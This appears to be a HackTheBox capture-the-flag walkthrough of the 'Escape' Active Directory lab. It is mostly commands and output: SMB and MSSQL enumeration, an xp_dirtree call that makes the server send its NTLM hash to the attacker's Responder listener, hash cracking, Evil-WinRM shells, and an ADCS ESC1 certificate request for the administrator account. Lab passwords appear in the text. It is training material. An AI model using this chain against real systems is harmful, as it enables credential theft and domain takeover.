Escape
AD box on HTB.
Enumeration:
Port Scanning:
We will start with nmap:
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Escape]
└─$ sudo nmap -sCV -p- --min-rate 4000 -oA nmap/services -vv 10.129.128.53
Nmap scan report for 10.129.128.53
Host is up, received echo-reply ttl 127 (0.12s latency).
Scanned at 2025-09-11 13:58:27 +03 for 284s
Not shown: 65515 filtered tcp ports (no-response)
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack ttl 127 Simple DNS Plus
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-09-11 18:59:11Z)
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-09-11T19:01:15+00:00; +8h00m04s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Issuer: commonName=sequel-DC-CA/domainComponent=sequel
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-01-18T23:03:57
| Not valid after: 2074-01-05T23:03:57
| MD5: ee4c:c647:ebb2:c23e:f472:1d70:2880:9d82
| SHA-1: d88d:12ae:8a50:fcf1:2242:909e:3dd7:5cff:92d1:a480
| -----BEGIN CERTIFICATE-----
| MIIFkTCCBHmgAwIBAgITHgAAAAsyZYRdLEkTIgAAAAAACzANBgkqhkiG9w0BAQsF
<snipped>
|_-----END CERTIFICATE-----
445/tcp open microsoft-ds? syn-ack ttl 127
464/tcp open kpasswd5? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-09-11T19:01:15+00:00; +8h00m03s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Issuer: commonName=sequel-DC-CA/domainComponent=sequel
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-01-18T23:03:57
| Not valid after: 2074-01-05T23:03:57
| MD5: ee4c:c647:ebb2:c23e:f472:1d70:2880:9d82
| SHA-1: d88d:12ae:8a50:fcf1:2242:909e:3dd7:5cff:92d1:a480
| -----BEGIN CERTIFICATE-----
| MIIFkTCCBHmgAwIBAgITHgAAAAsyZYRdLEkTIgAAAAAACzANBgkqhkiG9w0BAQsF
<snipped>
|_-----END CERTIFICATE----- 14:06:22 [128/589]
1433/tcp open ms-sql-s syn-ack ttl 127 Microsoft SQL Server 2019 15.00.2000.00; RTM
| ms-sql-info:
| 10.129.128.53:1433:
| Version:
| name: Microsoft SQL Server 2019 RTM
| number: 15.00.2000.00
| Product: Microsoft SQL Server 2019
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
| ms-sql-ntlm-info:
| 10.129.128.53:1433:
| Target_Name: sequel
| NetBIOS_Domain_Name: sequel
| NetBIOS_Computer_Name: DC
| DNS_Domain_Name: sequel.htb
| DNS_Computer_Name: dc.sequel.htb
| DNS_Tree_Name: sequel.htb
|_ Product_Version: 10.0.17763
|_ssl-date: 2025-09-11T19:01:16+00:00; +8h00m04s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-09-11T18:42:20
| Not valid after: 2055-09-11T18:42:20
| MD5: 0819:6d15:add6:80f6:58a8:40b0:e112:6b85
| SHA-1: 4979:7601:7304:1196:3673:6d78:ae9f:807a:bbce:d5be
| -----BEGIN CERTIFICATE-----
| MIIDADCCAeigAwIBAgIQSmZ8PTuaSZBK6Dp3OwmheTANBgkqhkiG9w0BAQsFADA7
<snipped>
|_-----END CERTIFICATE-----
3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Issuer: commonName=sequel-DC-CA/domainComponent=sequel
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-01-18T23:03:57
| Not valid after: 2074-01-05T23:03:57
| MD5: ee4c:c647:ebb2:c23e:f472:1d70:2880:9d82
| SHA-1: d88d:12ae:8a50:fcf1:2242:909e:3dd7:5cff:92d1:a480
| -----BEGIN CERTIFICATE-----
| MIIFkTCCBHmgAwIBAgITHgAAAAsyZYRdLEkTIgAAAAAACzANBgkqhkiG9w0BAQsF
<snipped>
|_-----END CERTIFICATE-----
|_ssl-date: 2025-09-11T19:01:16+00:00; +8h00m04s from scanner time.
3269/tcp open ssl/ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc.sequel.htb, DNS:sequel.htb, DNS:sequel
| Issuer: commonName=sequel-DC-CA/domainComponent=sequel
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-01-18T23:03:57
| Not valid after: 2074-01-05T23:03:57
| MD5: ee4c:c647:ebb2:c23e:f472:1d70:2880:9d82
| SHA-1: d88d:12ae:8a50:fcf1:2242:909e:3dd7:5cff:92d1:a480
| -----BEGIN CERTIFICATE-----
| MIIFkTCCBHmgAwIBAgITHgAAAAsyZYRdLEkTIgAAAAAACzANBgkqhkiG9w0BAQsF
<snipped>
|_-----END CERTIFICATE-----
5985/tcp open http syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf syn-ack ttl 127 .NET Message Framing
49667/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49689/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
49690/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49715/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49724/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49745/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
<snipped>
|_clock-skew: mean: 8h00m03s, deviation: 0s, median: 8h00m03s
<snipped>I will sync the time with the target using ntpdate:
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Escape]
└─$ sudo ntpdate 10.129.128.53
2025-09-11 22:05:18.276674 (+0300) +28803.869813 +/- 0.120404 10.129.128.53 s1 no-leap
CLOCK: time stepped by 28803.869813Lets get the FQDN of the target:
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Escape]
└─$ netexec smb 10.129.128.53
SMB 10.129.128.53 445 DC [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:sequel.htb) (signing:True) (SMBv1:False)I will add it to the hosts file with its corresponding IP address:
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Escape]
└─$ cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali
<snipped>
10.129.128.53 DC.sequel.htb sequel.htb DCShares:
First we will enumerate the shares with guest session via netexec:
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Escape]
└─$ netexec smb dc.sequel.htb -u 'guest' -p '' --shares
SMB 10.129.128.53 445 DC [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:sequel.htb) (signing:True) (SMBv1:False)
SMB 10.129.128.53 445 DC [+] sequel.htb\guest:
SMB 10.129.128.53 445 DC [*] Enumerated shares
SMB 10.129.128.53 445 DC Share Permissions Remark
SMB 10.129.128.53 445 DC ----- ----------- ------
SMB 10.129.128.53 445 DC ADMIN$ Remote Admin
SMB 10.129.128.53 445 DC C$ Default share
SMB 10.129.128.53 445 DC IPC$ READ Remote IPC
SMB 10.129.128.53 445 DC NETLOGON Logon server share
SMB 10.129.128.53 445 DC Public READ
SMB 10.129.128.53 445 DC SYSVOL Logon server shareWe have one non-default share called Public, we also have read persmissions over it.
I will use smbclient to interact with this share:
┌──(kali㉿kali)-[~/…/Machines/HackTheBox/Escape/smb]
└─$ smbclient //10.129.128.53/Public
Password for [WORKGROUP\kali]:
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Sat Nov 19 14:51:25 2022
.. D 0 Sat Nov 19 14:51:25 2022
SQL Server Procedures.pdf A 49551 Fri Nov 18 16:39:43 2022
5184255 blocks of size 4096. 1466963 blocks available
smb: \> mget *
Get file SQL Server Procedures.pdf? y
getting file \SQL Server Procedures.pdf of size 49551 as SQL Server Procedures.pdf (34.2 KiloBytes/sec) (average 34.2 KiloBytes/sec)
smb: \> exit
┌──(kali㉿kali)-[~/…/Machines/HackTheBox/Escape/smb]
└─$ open SQL\ Server\ Procedures.pdfWe have one pdf file.
Lets open it up:
We will find credentials for the new hired employee: PublicUser:GuestUserCanWrite1, and with those credentials we can authenticate to the database.
Exploitation:
Check if those credentials are still valid using netexec:
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Escape]
└─$ netexec mssql dc.sequel.htb -u PublicUser -p GuestUserCantWrite1 --local-auth
MSSQL 10.129.128.53 1433 DC [*] Windows 10 / Server 2019 Build 17763 (name:DC) (domain:sequel.htb)
MSSQL 10.129.128.53 1433 DC [+] DC\PublicUser:GuestUserCantWrite1Nice, we can see the + sign which indicate they are still valid.
I will use the impacket-mssqlclient to authenticate to the database, and try to paly with it:
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Escape]
└─$ impacket-mssqlclient sequel.htb/publicuser:GuestUserCantWrite1@10.129.128.53
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC\SQLMOCK): Line 1: Changed database context to 'master'.
[*] INFO(DC\SQLMOCK): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208)
[!] Press help for extra shell commands
SQL (PublicUser guest@master)> Enumerate the database:
SQL (PublicUser guest@master)> select name from master..sysdatabases;
name
------
master
tempdb
model
msdb Nothing useful, all those databases are default ones.
MSSQL dbms has interesting feature that if misconfigured, we can view the internal system directories using the xp_dirtree command.
But we can not do anything even if we can view the directories, but what we can take advantage of is since we are in the same network, we can abuse LLMNR poisoning again.
Before executing the command above we will run responder to listen to any net ntlm hashes:
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Escape]
└─$ sudo responder -I tun0 -dvw
[sudo] password for kali:
__
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|
[+] Poisoners:
LLMNR [ON]
NBT-NS [ON]
MDNS [ON]
DNS [ON]
DHCP [ON]
[+] Servers:
HTTP server [ON]
HTTPS server [ON]
WPAD proxy [ON]
Auth proxy [OFF]
SMB server [ON]
Kerberos server [ON]
SQL server [ON]
FTP server [ON]
IMAP server [ON]
POP3 server [ON]
SMTP server [ON]
DNS server [ON]
LDAP server [ON]
MQTT server [ON]
RDP server [ON]
DCE-RPC server [ON]
WinRM server [ON]
SNMP server [ON]
[+] HTTP Options:
Always serving EXE [OFF]
Serving EXE [OFF]
Serving HTML [OFF]
Upstream Proxy [OFF]
[+] Poisoning Options:
Analyze Mode [OFF]
Force WPAD auth [OFF]
Force Basic Auth [OFF]
Force LM downgrade [OFF]
Force ESS downgrade [OFF]
[+] Generic Options:
Responder NIC [tun0]
Responder IP [10.10.16.7]
Responder IPv6 [dead:beef:4::1005]
Challenge set [random]
Don't Respond To Names ['ISATAP', 'ISATAP.LOCAL']
Don't Respond To MDNS TLD ['_DOSVC']
TTL for poisoned response [default]
[+] Current Session Variables:
Responder Machine Name [WIN-INB06VAZIW7]
Responder Domain Name [L8LZ.LOCAL]
Responder DCE-RPC Port [46414]
[*] Version: Responder 3.1.7.0
[*] Author: Laurent Gaffie, <lgaffie@secorizon.com>
[*] To sponsor Responder: https://paypal.me/PythonResponder
[+] Listening for events...Run the command:
SQL (PublicUser guest@master)> xp_dirtree \\10.10.16.7\share\doesnotexist
subdirectory depth file
------------ ----- ----[SMB] NTLMv2-SSP Client : 10.129.128.53
[SMB] NTLMv2-SSP Username : sequel\sql_svc
[SMB] NTLMv2-SSP Hash : sql_svc::sequel:4c2b3e3ba4d29146:DBE407CE9436C7E96B6ECF457B7A8000:0101000000000000808145C82623DC0134CB90D74E0C86B100000000020008004C0038004C005
A0001001E00570049004E002D0049004E00420030003600560041005A0049005700370004003400570049004E002D0049004E00420030003600560041005A004900570037002E004C0038004C005A002E004C004F00
430041004C00030014004C0038004C005A002E004C004F00430041004C00050014004C0038004C005A002E004C004F00430041004C0007000800808145C82623DC01060004000200000008003000300000000000000
00000000000300000DF274434FF68EE63F87F201C8E31C8F943F0AC0D138B5D624D09CB4A7216EEEE0A0010000000000000000000000000000000000009001E0063006900660073002F00310030002E00310030002E
00310036002E0037000000000000000000
[+] Exiting...Here we received the hash of the user running this service, if we could not crack his password, we can attempt to try to relay it to other services.
Shell as sql_svc:
Save the hash into a file and crack it using hashcat:
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Escape]
└─$ hashcat sql_svc.hash --show
Hash-mode was not specified with -m. Attempting to auto-detect hash mode.
The following mode was auto-detected as the only one matching your input hash:
5600 | NetNTLMv2 | Network Protocol
NOTE: Auto-detect is best effort. The correct hash-mode is NOT guaranteed!
Do NOT report auto-detect issues unless you are certain of the hash type.
SQL_SVC::sequel:4c2b3e3ba4d29146:dbe407ce9436c7e96b6ecf457b7a8000:0101000000000000808145c82623dc0134cb90d74e0c86b100000000020008004c0038004c005a0001001e00570049004e002d0049004e00420030003600560041005a0049005700370004003400570049004e002d0049004e00420030003600560041005a004900570037002e004c0038004c005a002e004c004f00430041004c00030014004c0038004c005a002e004c004f00430041004c00050014004c0038004c005a002e004c004f00430041004c0007000800808145c82623dc0106000400020000000800300030000000000000000000000000300000df274434ff68ee63f87f201c8e31c8f943f0ac0d138b5d624d09cb4a7216eeee0a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e00310030002e00310036002e0037000000000000000000:REGGIE1234ronnieCool, we were able to crack it, and now we have another valid username, and password.
We can check if we can use those username, and password to authenticate to the machine via WinRM:
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Escape]
└─$ netexec mssql dc.sequel.htb -u sql_svc -p REGGIE1234ronnie
MSSQL 10.129.128.53 1433 DC [*] Windows 10 / Server 2019 Build 17763 (name:DC) (domain:sequel.htb)
MSSQL 10.129.128.53 1433 DC [+] sequel.htb\sql_svc:REGGIE1234ronnie
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Escape]
└─$ netexec winrm dc.sequel.htb -u sql_svc -p REGGIE1234ronnie
WINRM 10.129.128.53 5985 DC [*] Windows 10 / Server 2019 Build 17763 (name:DC) (domain:sequel.htb)
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 a
nd will be removed from this module in 48.0.0.
arc4 = algorithms.ARC4(self._key)
WINRM 10.129.128.53 5985 DC [+] sequel.htb\sql_svc:REGGIE1234ronnie (Pwn3d!)┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Escape]
└─$ evil-winrm -i 10.129.128.53 -u sql_svc -p REGGIE1234ronnie
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\sql_svc\Documents>We authenticated as sql_svc user.
Lateral Movement to ryan.cooper:
After doing some enumeration, we will find an appealing folder in the root of the file system:
*Evil-WinRM* PS C:\> dir
Directory: C:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 2/1/2023 8:15 PM PerfLogs
d-r--- 2/6/2023 12:08 PM Program Files
d----- 11/19/2022 3:51 AM Program Files (x86)
d----- 11/19/2022 3:51 AM Public
d----- 2/1/2023 1:02 PM SQLServer
d-r--- 2/1/2023 1:55 PM Users
d----- 2/6/2023 7:21 AM WindowsWe can navigate to that folder, and view what it contains:
*Evil-WinRM* PS C:\> cd sqlserver
*Evil-WinRM* PS C:\sqlserver> dir
Directory: C:\sqlserver
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 2/7/2023 8:06 AM Logs
d----- 11/18/2022 1:37 PM SQLEXPR_2019
-a---- 11/18/2022 1:35 PM 6379936 sqlexpress.exe
-a---- 11/18/2022 1:36 PM 268090448 SQLEXPR_x64_ENU.exe
*Evil-WinRM* PS C:\sqlserver>Another interesting folder (Logs):
*Evil-WinRM* PS C:\sqlserver> cd logs
*Evil-WinRM* PS C:\sqlserver\logs> dir 14:27:40 [192/396]
Directory: C:\sqlserver\logs
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 2/7/2023 8:06 AM 27608 ERRORLOG.BAKWe have errorlog backup file, lets read it:
*Evil-WinRM* PS C:\sqlserver\logs> type errorlog.bak
2022-11-18 13:43:05.96 Server Microsoft SQL Server 2019 (RTM) - 15.0.2000.5 (X64)
Sep 24 2019 13:48:23
Copyright (C) 2019 Microsoft Corporation
Express Edition (64-bit) on Windows Server 2019 Standard Evaluation 10.0 <X64> (Build 17763: ) (Hypervisor)
2022-11-18 13:43:05.97 Server UTC adjustment: -8:00
<snipped>
2022-11-18 13:43:07.44 Logon Logon failed for user 'sequel.htb\Ryan.Cooper'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
2022-11-18 13:43:07.48 Logon Error: 18456, Severity: 14, State: 8.
2022-11-18 13:43:07.48 Logon Logon failed for user 'NuclearMosquito3'. Reason: Password did not match that for the login provided. [CLIENT: 127.0.0.1]
2022-11-18 13:43:07.72 spid51 Attempting to load library 'xpstar.dll' into memory. This is an informational message only. No user action is required.
<snipped>We will notice some entries has some juicy information, lets test those out using netexec:
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Escape]
└─$ netexec smb dc.sequel.htb -u ryan.cooper -p 'NuclearMosquito3'
SMB 10.129.128.53 445 DC [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:sequel.htb) (signing:True) (SMBv1:False)
SMB 10.129.128.53 445 DC [+] sequel.htb\ryan.cooper:NuclearMosquito3
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Escape]
└─$ netexec winrm dc.sequel.htb -u ryan.cooper -p 'NuclearMosquito3'
WINRM 10.129.128.53 5985 DC [*] Windows 10 / Server 2019 Build 17763 (name:DC) (domain:sequel.htb)
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 a
nd will be removed from this module in 48.0.0.
arc4 = algorithms.ARC4(self._key)
WINRM 10.129.128.53 5985 DC [+] sequel.htb\ryan.cooper:NuclearMosquito3 (Pwn3d!)Indeed they are valid, and still valid.
BloodHound:
It is time for bloodhound:
┌──(kali㉿kali)-[~/…/Machines/HackTheBox/Escape/bloodhound] 14:46:09 [24/238]
└─$ rusthound-ce -u ryan.cooper -p NuclearMosquito3 -d sequel.htb -f dc.sequel.htb -i 10.129.128.53 -n 10.129.128.53 -P 636
---------------------------------------------------
Initializing RustHound-CE at 14:46:01 on 09/11/25
Powered by @g0h4n_0
---------------------------------------------------
[2025-09-11T11:46:01Z INFO rusthound_ce] Verbosity level: Info
[2025-09-11T11:46:01Z INFO rusthound_ce] Collection method: All
[2025-09-11T11:46:02Z INFO rusthound_ce::ldap] Connected to SEQUEL.HTB Active Directory!
[2025-09-11T11:46:02Z INFO rusthound_ce::ldap] Starting data collection...
[2025-09-11T11:46:02Z INFO rusthound_ce::ldap] Ldap filter : (objectClass=*)
[2025-09-11T11:46:04Z INFO rusthound_ce::ldap] All data collected for NamingContext DC=sequel,DC=htb
[2025-09-11T11:46:04Z INFO rusthound_ce::ldap] Ldap filter : (objectClass=*)
[2025-09-11T11:46:06Z INFO rusthound_ce::ldap] All data collected for NamingContext CN=Configuration,DC=sequel,DC=htb
[2025-09-11T11:46:06Z INFO rusthound_ce::ldap] Ldap filter : (objectClass=*)
[2025-09-11T11:46:08Z INFO rusthound_ce::ldap] All data collected for NamingContext CN=Schema,CN=Configuration,DC=sequel,DC=htb
[2025-09-11T11:46:08Z INFO rusthound_ce::ldap] Ldap filter : (objectClass=*)
[2025-09-11T11:46:09Z INFO rusthound_ce::ldap] All data collected for NamingContext DC=DomainDnsZones,DC=sequel,DC=htb
[2025-09-11T11:46:09Z INFO rusthound_ce::ldap] Ldap filter : (objectClass=*)
[2025-09-11T11:46:09Z INFO rusthound_ce::ldap] All data collected for NamingContext DC=ForestDnsZones,DC=sequel,DC=htb
[2025-09-11T11:46:09Z INFO rusthound_ce::api] Starting the LDAP objects parsing...
⢀ Parsing LDAP objects: 1%
[2025-09-11T11:46:09Z INFO rusthound_ce::objects::enterpriseca] Found 12 enabled certificate templates
[2025-09-11T11:46:09Z INFO rusthound_ce::api] Parsing LDAP objects finished!
[2025-09-11T11:46:09Z INFO rusthound_ce::json::checker] Starting checker to replace some values...
[2025-09-11T11:46:09Z INFO rusthound_ce::json::checker] Checking and replacing some values finished!
[2025-09-11T11:46:09Z INFO rusthound_ce::json::maker::common] 10 users parsed!
[2025-09-11T11:46:09Z INFO rusthound_ce::json::maker::common] .//20250911144609_sequel-htb_users.json created!
[2025-09-11T11:46:09Z INFO rusthound_ce::json::maker::common] 61 groups parsed!
[2025-09-11T11:46:09Z INFO rusthound_ce::json::maker::common] .//20250911144609_sequel-htb_groups.json created!
[2025-09-11T11:46:09Z INFO rusthound_ce::json::maker::common] 1 computers parsed!
[2025-09-11T11:46:09Z INFO rusthound_ce::json::maker::common] .//20250911144609_sequel-htb_computers.json created!
[2025-09-11T11:46:09Z INFO rusthound_ce::json::maker::common] 1 ous parsed!
[2025-09-11T11:46:09Z INFO rusthound_ce::json::maker::common] .//20250911144609_sequel-htb_ous.json created!
[2025-09-11T11:46:09Z INFO rusthound_ce::json::maker::common] 3 domains parsed!
[2025-09-11T11:46:09Z INFO rusthound_ce::json::maker::common] .//20250911144609_sequel-htb_domains.json created!
[2025-09-11T11:46:09Z INFO rusthound_ce::json::maker::common] 2 gpos parsed!
[2025-09-11T11:46:09Z INFO rusthound_ce::json::maker::common] .//20250911144609_sequel-htb_gpos.json created!
[2025-09-11T11:46:09Z INFO rusthound_ce::json::maker::common] 74 containers parsed!
[2025-09-11T11:46:09Z INFO rusthound_ce::json::maker::common] .//20250911144609_sequel-htb_containers.json created!
[2025-09-11T11:46:09Z INFO rusthound_ce::json::maker::common] 1 ntauthstores parsed!
[2025-09-11T11:46:09Z INFO rusthound_ce::json::maker::common] .//20250911144609_sequel-htb_ntauthstores.json created!
[2025-09-11T11:46:09Z INFO rusthound_ce::json::maker::common] 1 aiacas parsed!
[2025-09-11T11:46:09Z INFO rusthound_ce::json::maker::common] .//20250911144609_sequel-htb_aiacas.json created!
[2025-09-11T11:46:09Z INFO rusthound_ce::json::maker::common] 1 rootcas parsed!
[2025-09-11T11:46:09Z INFO rusthound_ce::json::maker::common] .//20250911144609_sequel-htb_rootcas.json created!
[2025-09-11T11:46:09Z INFO rusthound_ce::json::maker::common] 1 enterprisecas parsed!
[2025-09-11T11:46:09Z INFO rusthound_ce::json::maker::common] .//20250911144609_sequel-htb_enterprisecas.json created!
[2025-09-11T11:46:09Z INFO rusthound_ce::json::maker::common] 34 certtemplates parsed!
[2025-09-11T11:46:09Z INFO rusthound_ce::json::maker::common] .//20250911144609_sequel-htb_certtemplates.json created!
[2025-09-11T11:46:09Z INFO rusthound_ce::json::maker::common] 3 issuancepolicies parsed!
[2025-09-11T11:46:09Z INFO rusthound_ce::json::maker::common] .//20250911144609_sequel-htb_issuancepolicies.json created!
RustHound-CE Enumeration Completed at 14:46:09 on 09/11/25! Happy Graphing!Also run bloodhound:
┌──(kali㉿kali)-[~/…/Machines/HackTheBox/Escape/bloodhound]
└─$ sudo bloodhound
Starting neo4j
Neo4j is not running.
<snipped>
......................................................
Bloodhound will start
IMPORTANT: It will take time, please wait...
<snipped>
opening http://127.0.0.1:8080Upload the ingested data to bloodhound.
After some exploration, we will find this attack path to get domain admins on the domain by abusing ADCS ESC1.
Post-Exploitation:
Lets collect the ADCS data with certipy-ad, and add -vulnerable to the command, to only show the vulnerable templates:
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Escape]
└─$ certipy-ad find -u ryan.cooper -p NuclearMosquito3 -dc-ip 10.129.128.53 -vulnerable
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Finding issuance policies
[*] Found 15 issuance policies
[*] Found 0 OIDs linked to templates
[*] Retrieving CA configuration for 'sequel-DC-CA' via RRP
[*] Successfully retrieved CA configuration for 'sequel-DC-CA'
[*] Checking web enrollment for CA 'sequel-DC-CA' @ 'dc.sequel.htb'
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[*] Saving text output to '20250911143138_Certipy.txt'
[*] Wrote text output to '20250911143138_Certipy.txt'
[*] Saving JSON output to '20250911143138_Certipy.json'
[*] Wrote JSON output to '20250911143138_Certipy.json'ADCS Abuse:
Read the output:
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Escape] 14:31:46 [173/366]
└─$ cat 20250911143138_Certipy.txt
Certificate Authorities
0
CA Name : sequel-DC-CA
DNS Name : dc.sequel.htb
Certificate Subject : CN=sequel-DC-CA, DC=sequel, DC=htb
Certificate Serial Number : 1EF2FA9A7E6EADAD4F5382F4CE283101
Certificate Validity Start : 2022-11-18 20:58:46+00:00
Certificate Validity End : 2121-11-18 21:08:46+00:00
Web Enrollment
HTTP
Enabled : False
HTTPS
Enabled : False
User Specified SAN : Disabled
Request Disposition : Issue
Enforce Encryption for Requests : Enabled
Active Policy : CertificateAuthority_MicrosoftDefault.Policy
Permissions
Owner : SEQUEL.HTB\Administrators
Access Rights
ManageCa : SEQUEL.HTB\Administrators
SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
ManageCertificates : SEQUEL.HTB\Administrators
SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
Enroll : SEQUEL.HTB\Authenticated Users
Certificate Templates
0
Template Name : UserAuthentication
Display Name : UserAuthentication
Certificate Authorities : sequel-DC-CA
Enabled : True
Client Authentication : True
Enrollment Agent : False
Any Purpose : False
Enrollee Supplies Subject : True
Certificate Name Flag : EnrolleeSuppliesSubject
Enrollment Flag : IncludeSymmetricAlgorithms
PublishToDs
Private Key Flag : ExportableKey
Extended Key Usage : Client Authentication
Secure Email
Encrypting File System
Requires Manager Approval : False
Requires Key Archival : False
Authorized Signatures Required : 0
Schema Version : 2
Validity Period : 10 years
Renewal Period : 6 weeks
Minimum RSA Key Length : 2048
Template Created : 2022-11-18T21:10:22+00:00
Template Last Modified : 2024-01-19T00:26:38+00:00
Permissions
Enrollment Permissions
Enrollment Rights : SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Domain Users
SEQUEL.HTB\Enterprise Admins
Object Control Permissions
Owner : SEQUEL.HTB\Administrator
Full Control Principals : SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
Write Owner Principals : SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
Write Dacl Principals : SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Enterprise Admins
Write Property Enroll : SEQUEL.HTB\Domain Admins
SEQUEL.HTB\Domain Users
SEQUEL.HTB\Enterprise Admins
[+] User Enrollable Principals : SEQUEL.HTB\Domain Users
[!] Vulnerabilities
ESC1 : Enrollee supplies subject and template allows client authentication.
By looking at the template we can confirm that this is not false positive by certipy-ad, because we as domain users can enroll in that template, also anotehr key aspect is EKU (extended key usage) has the value of client authentication, and finally we can notice the EnrolleeSuppliesSubject value in the certificate name flag which allows us to specify any UPN when requesting a certificate.
We will request a certificate for the administrator using the same tool:
┌──(kali㉿kali)-[~/…/CTF/Machines/HackTheBox/Escape]
└─$ certipy-ad req -username ryan.cooper@sequel.htb -password NuclearMosquito3 -target-ip 10.129.128.53 -ca sequel-DC-CA -template UserAuthentication -upn administrator@se
quel.htb
Certipy v5.0.2 - by Oliver Lyak (ly4k)
[!] DNS resolution failed: The DNS query name does not exist: SEQUEL.HTB.
[!] Use -debug to print a stacktrace
[*] Requesting certificate via RPC
[*] Request ID is 13
[*] Successfully requested certificate
[*] Got certificate with UPN 'administrator@sequel.htb'
[*] Certificate has no object SID
